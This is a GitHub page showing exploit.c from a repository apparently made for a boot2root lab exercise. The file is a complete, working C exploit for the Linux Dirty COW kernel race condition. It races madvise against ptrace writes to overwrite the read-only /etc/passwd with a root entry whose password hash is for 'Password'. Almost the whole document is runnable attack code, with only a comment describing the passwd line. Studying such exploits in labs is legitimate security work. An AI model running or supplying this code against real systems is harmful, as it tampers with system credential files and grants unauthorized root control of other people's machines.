Boot2root/scripts/exploit.c at main · Assxios/Boot2root · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <unistd.h>


int f;                      // file descriptor
void *map;                  // memory map
pid_t pid;                  // process id
pthread_t pth;              // thread
struct stat st;             // file info
char *str = "/etc/passwd";  // file path
char *line = "root:As.Qw2p5l2zVE:0:0::/root:/bin/bash\n";
/*
Here is the structure of the line:
struct User {
   char *username = "root";
   char *hash = "As.Qw2p5l2zVE"; // password is "Password" then we hashed it using crypt() function
   int user_id = 0;
   int group_id = 0;
   char *info = "";
   char *home_dir = "/root";
   char *shell = "/bin/bash";
};
*/


void *madviseThread(void *arg)
{
    int i,c = 0;
    for(i = 0; i < 200000000; i++)
        c += madvise(map, 100, MADV_DONTNEED);
    printf("madvise %d\n\n", c);
}


int main()
{
    f = open(str, O_RDONLY);
    fstat(f, &st);

    map=mmap(NULL, st.st_size+sizeof(long), PROT_READ, MAP_PRIVATE, f, 0);
    printf("mmap %lx\n\n", (unsigned long)map);

    pid=fork();
    if(pid)
    {
        waitpid(pid, NULL, 0);
        int u,i,o,c = 0;
        int l = strlen(line);

        for(i = 0; i < 10000/l; i++)
            for(o = 0; o < l; o++)
                for(u = 0; u < 10000; u++)
                    c += ptrace(PTRACE_POKETEXT, pid, map+o, *((long*)(line+o)));
        printf("ptrace %d\n\n", c);
    }
    else
    {
        pthread_create(&pth, NULL, madviseThread, NULL);
        ptrace(PTRACE_TRACEME);
        kill(getpid(), SIGSTOP);
        pthread_join(pth, NULL);
    }

    return 0;
}